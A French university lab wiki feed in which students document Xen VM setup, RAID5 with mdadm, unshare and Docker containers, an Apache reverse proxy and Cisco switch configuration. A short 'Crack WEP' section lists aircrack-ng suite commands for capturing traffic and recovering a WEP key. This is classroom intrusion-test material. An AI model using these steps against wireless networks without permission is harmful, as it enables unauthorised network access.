                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Suite à une erreur de manipulation le /var est mort&lt;br /&gt;
&lt;br /&gt;
Pour réaliser la suite du TP j'ai recrée une VM Dionysos2, même addresse IP.&lt;br /&gt;
&lt;br /&gt;
Il faut donc éteindre la VM Dionysos pour éviter tout problème&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur '''Cordouan''' =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de sites (IPv4) ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49064</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49064"/>
				<updated>2018-12-21T09:51:24Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Cassage de mot de passe WPA-PSK par force brute */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
  xl create Dionysos.cfg&lt;br /&gt;
  xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
Dans /root/.profile&lt;br /&gt;
  &lt;br /&gt;
  http_proxy=&amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
